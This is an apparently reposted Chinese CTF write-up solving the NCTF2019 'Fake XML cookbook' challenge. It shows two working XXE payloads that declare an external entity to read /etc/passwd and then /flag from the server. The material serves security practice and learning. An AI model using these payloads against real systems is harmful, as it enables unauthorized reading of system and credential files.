当前位置:网站首页>[NCTF2019]Fake XML cookbook
[NCTF2019]Fake XML cookbook
2022-07-13 17:41:00 【Bnessy】
根据题目名字知道是XXE漏洞,直接burp抓包看一下,发现有XML实体
尝试读取下文件
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///etc/passwd"> ]>
<user><username>&admin;</username><password>admin</password></user>
一般flag都在根目录下,修改下payload读取flag
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///flag"> ]>
<user><username>&admin;</username><password>admin</password></user>
边栏推荐
猜你喜欢
CONDA based operation record of starting a tensorflow GPU (2.6.0) environment on win10 from scratch (2022.07)
【黄啊码】MySQL的这些小知识点,初入门的你必须得学会
【黄啊码】MySQL入门—2、使用数据定义语言(DDL)操作数据库
JS scope and scope chain
【黄啊码】微信小程序+php实现即时通讯聊天功能
JS根据二进制数据下载文件
ES6--arr(数组)-map-set的转换
ES6--数组
![[tensorflow2] implementation of gradient inversion layer (GRL) and domain antagonism training neural network (Dann)](/img/c4/1e1d68a69cb41da8ebb6463a35ca82.png)
[tensorflow2] implementation of gradient inversion layer (GRL) and domain antagonism training neural network (Dann)
【黄啊码】PHP配合xlswriter实现无限表头层级Excel导出
随机推荐
Secondary development tutorial of fastadmin [simple construction, multi table problems, API development]
使用 ramda 解析 .yarnrc/.npmrc 配置文件的例子
[Huang ah code] PHP cooperates with xlwriter to realize infinite header level excel export
C语言:结构体中链表的添加与删除
ES6--arr(数组)-map-set的转换
Implementation principle of new keyword in JS
admin 系统被嵌套在第三方系统中的跨域异常
Steps for JS parsing engine to execute JS code
CONDA based operation record of starting a tensorflow GPU (2.6.0) environment on win10 from scratch (2022.07)
37.js--对象的成员操作和原型对象的操作(主要是相关程序举例)
Cross domain exceptions where the admin system is nested in a third-party system
JS numeric serial number to alphabetic serial number
组件化编程之组件基础
JS中Math对象
js--数据系统内置功能
自调用函数和因不声明变量而自动定义var的相关问题
Understanding service governance in distributed development
ES6--解构赋值(重点)
千亿参数的广告模型,是怎样炼成的?
Memo, usememo, usecallback summary